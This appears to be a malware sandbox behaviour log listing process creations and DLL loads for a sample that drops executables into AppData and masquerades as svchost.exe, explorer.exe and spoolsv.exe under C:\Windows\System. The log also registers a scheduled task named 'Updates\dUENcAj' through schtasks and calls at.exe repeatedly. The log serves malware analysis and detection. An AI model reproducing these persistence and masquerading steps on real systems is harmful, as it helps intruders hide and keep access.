Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Process created: C:\Users\user\AppData\Roaming\duencaj.exe c:\users\user\appdata\roaming\duencaj.exe
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Process created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exe
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmp183D.tmp"
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process created: C:\Users\user\AppData\Roaming\duencaj.exe "c:\users\user\appdata\roaming\duencaj.exe "
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process created: C:\Users\user\AppData\Roaming\duencaj.exe "c:\users\user\appdata\roaming\duencaj.exe "
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Process created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exe

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System\explorer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System\svchost.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\svchost.exe	Section loaded: msvbvm60.dll
Source: C:\Windows\System\svchost.exe	Section loaded: vb6zz.dll
Source: C:\Windows\System\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System\svchost.exe	Section loaded: sxs.dll
Source: C:\Windows\System\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\System\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System\svchost.exe	Section loaded: drprov.dll
Source: C:\Windows\System\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System\svchost.exe	Section loaded: ntlanman.dll
Source: C:\Windows\System\svchost.exe	Section loaded: davclnt.dll
Source: C:\Windows\System\svchost.exe	Section loaded: davhlpr.dll
Source: C:\Windows\System\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System\svchost.exe	Section loaded: cscapi.dll
Source: C:\Windows\System\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System\svchost.exe	Section loaded: browcli.dll
Source: C:\Windows\System\spoolsv.exe	Section loaded: msvbvm60.dll
Source: C:\Windows\System\spoolsv.exe	Section loaded: vb6zz.dll
Source: C:\Windows\System\spoolsv.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\spoolsv.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System\spoolsv.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: msv1_0.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\at.exe	Section loaded: schedcli.dll
